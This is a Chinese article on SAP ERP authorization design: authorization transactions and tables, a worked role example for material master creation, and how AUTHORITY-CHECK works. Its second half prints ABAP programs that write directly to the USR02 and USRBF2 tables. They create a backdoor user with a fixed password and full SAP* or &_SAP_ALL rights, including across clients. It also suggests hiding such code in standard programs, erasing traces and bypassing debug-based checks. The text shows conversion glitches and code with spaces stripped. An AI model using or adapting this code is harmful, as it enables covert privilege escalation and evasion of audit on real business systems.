SAP权限设计简介剖析

1、UST04:UserProfilemaster(介绍小技巧-ERP权限控制繁中求简,闲聊一下SAP复杂权限设计的基本思想。特别是适合大公司业务的ERP系统,应该供应一个特别完满的权限控制体系限控制字段细到字段级别，若是权限控制都做不到这点，估计产品销售就够呛！,甚至赞同将权多年以前，俺还在软件天真园时，老师部署的权限作业，权限大概是设计的：Select用户名From用户表where用户名=butcher（获得用户名）select权限组IDFrom权限表where用户名=butcher（获得用户对应的权限组ID）select*From权限控制列表where权限组ID=*（获得没个权限组ID对应的

2、明细权限列表也就是用户的明细权限）这种简单的权限设置是无法满足复杂的业务需求的，多年今后，居然国内还有好多软件公司在权限设计上还在玩这套小把戏。现在来看看“伟大的”SAP的权限设计思路，第一认识下几个Tcode和权限相关表格。常用权限相关Tcode.(一)Role(角色)相关T-code:PFCG创办ROLE_CMP角色比较SUPC批量建立角色profile(二)建立用户SU01建立用户SU01D显示用户SU2|SU3|SU50|SU51|SU52改变/显示用户个人参数SU10|SU12批量保护用户SUCOMP保护用户公司地址SUIM用户信息系统（重申一下）(三)建立用户组SUGR|SUGRD

3、_NAV保护用户组SUGRD|SUGR_NAV显示用户组(四)保护检查授权SU20|SU21自定义授权字段和授权对象SU53当出现权限问题可使用它检测未授权对象SU56:解析authoraztiondatabuffers.常用权限相关表格:TOBJ:Allavaiableauthorzationobjects.(ERPUSR12:用户级authoraztion值USR02:UserLogonData(USR03:UseraddressdataUSR05:UserMasterParameterID(Tcode.系统默认的所有授权对象,)SU3可查察用户参数文件的参数)ID默认值)USR41:当前

4、用户(即TcodeSM04看到的所有当前活动用户,包括各种对话系统通信类用户)USRBF2:记录当前用户所有的授权objects用户主数据中对应的权限参数文件名)UST10S:Singleprofiles(UST12:Authorizations(授权文件,权限参数和授权对象对应表详尽授权细节)重点提示：USR02/USRBF2/UST10S/UST12四个表包括的信息就是ERP权限控制的重点，USR02是用户主数据表，后三表和用户授权亲密相关。我现在举一个MM01建立物料主数据的实例，来说明第一步：建立角色（Tcode：PFCG）SAP的权限控制设计思路，步骤以下：图1中，假设建立角色ZMM

5、01。图1-12：在菜单Tab页选择“事务“加入MM01-创办物料&,你还可为程序,盘问这样的报表授权，选择”其余“还能够为数据库房等对象设置权限角色。图1-345：到“权限“Tab页看到系统自动产生的授权参数文件ProfilnameT-C1550437，尔后选择”更正授权数据“，进入图2。显然系统其实不意味你给了建立物料的权限就能任意使用该Tcode了，系统有更严格的认真控制。图2-12：我们能够看到建立物料主数据的权限分公司代码层次，库房层次，物料种类层次，销售组织层次，物料组层次，和工厂层次等等，特别是对于象公司代码，销售组织和工厂这样的组织层次授权字段，控制点是特别必要的，一个大公司推

6、行ERP，各公司代码，各公司代码下的各Plant授权用户只能建立各自的物料，现在来看看是如何控制到工厂级其余。图2-345：在每个控制级别（即权限控制字段）都分控制字段和作业，每个权限控制字段对应一个所谓的授权对象，工厂的授权对象是M_MATE_WRK,所有授权对象的作业一致都是ACTVT,包括01/02/03/06/08五个作业,即控制可否赞同创建更正显示删除等。比方MM01的作业只给03-显示，则只能显示物料。注：若是有特别权限控制需要，能够使用SU20|SU21自定义授权字段和授权对象图2-67：点击“工厂“，进去增加工厂权限，设置了工厂FRM1-FRM2。FRA1，FRA2和一个工厂范

7、围注：若是公司代码，物料类，物料组，工厂等授权字段选择*表示赞同输入该字段所有的内容。接下来，使用SU01建立一个用户假设名叫butcher，尔后在此将角色ZMM01分配给它，如图3，记得要做“用户比较“知道该按纽变绿，这和人带的帽子不同样，在角色设置中，越绿越好，至此，一个最简单的权限设置就Ok了，用户butcher只能使用MM01在工厂FRA1，FRA1，FRM1，FRM2四个工厂上建立物料主数据。现在来检查USRBF2/UST10S/UST12三个和用户授权相关的表格数据，如图4，图5和图6。图4是用户参数文件表USR10S和用户授权表USRBF2的合成图。图4-1346：UST10S表

8、的参数文件T-C1550437正是图1-4中定义角色ZMM01时生成的参数文件，对象表示的即授权对象，每个授权对象对应一个图4-6的权限名称T-C155043700|T-C155043701，这俩权限名称正是参数文件T-C1550437文件+系号。图4-25：用户授权对象表USRBF2包括了ERP用户BUTCHER所对应的（授权）对象和对象对应的权限名称，现在注意一下USRBF2表用户BUTCHER包括了工厂的授权对象M_MATE_WRK,其对应的授权名称是T-C155043700，那么图2-7设置的四个工厂FRA1，FRA1，FRM1，FRM2保存在什么地方呢？请见图6。为什么一个参数文件T

9、-C1550437产生了两个T-C155043700|T-C155043701权限名称呢？查察权限对象设置时发现，在库房授权对象M_MATE_LGN和销售组织/分销渠道授权M_MATE_VKO下系统竟默认了两次同样的授权作业，如图5。图5表示建立物料主数据的库房号和销售组织/分销渠道默认授权了两次。图6中，能够看到授权对象M_MATE_WRK(即工厂授权对象)有5条记录,其中字段ACTVT有01,06两条,分表表示赞同建立和删除物料数据,工厂WERKS有三条,正是FRA1,FRA2,和值FRM1到值FRM2，如图6-23。至此，权限设计的基本逻辑就特别清楚了，若是用户BUTCHER要建立某工厂

10、的物料，第一从授权表中查察可否有M_MATE_WRK的授权对象，尔后再到UST12去检查输入的工厂可否在授权范围，Ifnotso，则提示未授权。现在用户BUTCHER建立物料主数据，输入工厂1000，提示M3855未授权办理工厂1000的主数据，如图7。平时有两种便利方法查找到权限控制逻辑:(1).SE91输入M3855查找，(2).直接在物料主数据建立程序中查找，必然能看到该主程序的子程序下各处都有象图7-4的AUTHORITY-CHECKOBJECT授权对象名称IDACTVT作业赞同号ID授权字段FIELD用户输入内容“这样的权限检查逻辑。若是你认识了这个原理,那么有追踪程序和更正变量的权

11、限(对应授权对象要你稍微熟悉ABAP，实质上你就拥有了所有权限。下面的附件是一个使用追踪/H并更正授权返回变量的操作手册。S_DEVOP,02,只追踪获得权限操作.doc回顾这个实例，注意以下三点。1.创办角色Role将产生一个授权参数文件ProfielName。2.一个授权参数文件包括好多授权对象AuthorityObjects,实际上是若是将多个Tcode或报表或起其余什么的赐予一个Role,系统将这些Tcode(或报表)对应的授权对象带出,这些授权对象自然在Tcode(报表对应的)程序逻辑中会有表现,则角色对应的授权参数文件将包括这些授权对象。授权对象平时有两部分组成：一是作业ACTVT

12、，作业号分别是：创办或生成更正显示删除显示更正文档二是授权字段，这些授权字段平时是诸如组织结构层次的公司代码，工厂，或其余比方物料种类，凭证种类等，这样能够做到更细微的权限控制。到现在为止,我们知道，实质上决定权限的是授权对象AuthorizationObject!用户的授权对象表在USRBF2中，所以只要往这个表插入数据就获得了权限，现在能够使用SE38建立用户和授予权限,这意味着使用ABAP能够迅速获得所有权限。不如假设一下，一个ABAPer在开发机上建立这样的程序，尔后传输到生产系统？Basis能发现？理论上，高明的ABAPer是不大可能被发现的，它能够将这段代码甚至移值到一段很不常用的

13、标准程序比方Query，Reportpainter产生的自动程序上，并且在程序中填加删除所有印迹的代码，甚至能够设置好自毁该段程序,绕过AccessKey更正标准程序也是轻易的！下面的程序ZCRTUSER是建立用户ZSTHACKER(初始密码123qaz)并赐予SAP*用户的所有权限的参照程序。ProgramZCRTUSER.DataZUSR02likeUSR02.*1.CreateUserZSTHACKERaccordingtoDDICselectsingle*intoZUSR02fromUSR02whereBNAME=DDIC.ZUSR02-BNAME=ZSTHACKER.ZUSR02-B

14、code=E3B796BB09F7901B.insertUSR02fromZUSR02.*2.CopyAuth.ObjfromSAP*(orother)若是将WhereBNAME=SAP*去掉，基本就是复制所有的授权对象dataZUSRBF2likeUSRBF2occurs0withheaderline.select*fromUSRBF2intotableZUSRBF2whereBNAME=SAP*.LoopatZUSRBF2.ZUSRBF2-BNAME=ZSTHACKER.ModifyZUSRBF2INDEXsy-tabixTRANSPORTINGBNAME.endloop.INSERTUS

15、RBF2FROMTABLEZUSRBF2ACCEPTINGDUPLICATEKEYS.若是SAP*可能被删除,还可直接将TOBJ中包括的所有的ERP授权对象所有赐予给一个用户。以下程序ZALLOBJ是赐予所有的标准授权对象给用户ZSTHACKER。ProgramZALLOBJ。DataZtobjliketobjoccurs0withheaderline.datazusrbf2likeusrbf2.select*intotableztobjfromtobj.loopatztobj.zusrbf2-mandt=sy-mandt.zusrbf2-bname=ZSTHACKER.zusrbf2-obj

16、ct=ztobj-objct.zusrbf2-auth=&_SAP_ALL.modifyUSRBF2FROMzusrbf2.endloop.也可跨Client建立用户和赐予权限，只要使用clientspecifiedProgramZCLIENT.Datazusrbf2likeusrbf2.Select*intozusrbf2fromusrbf2wherebname=SAP*.Zusrbf2-bname=ZSTHACKER.Zusrbf2-mandt=100.Insertintousrbf2clientspecifiedvalueszusrbf2.Endselect.就可以。下面是一句话更正SAP*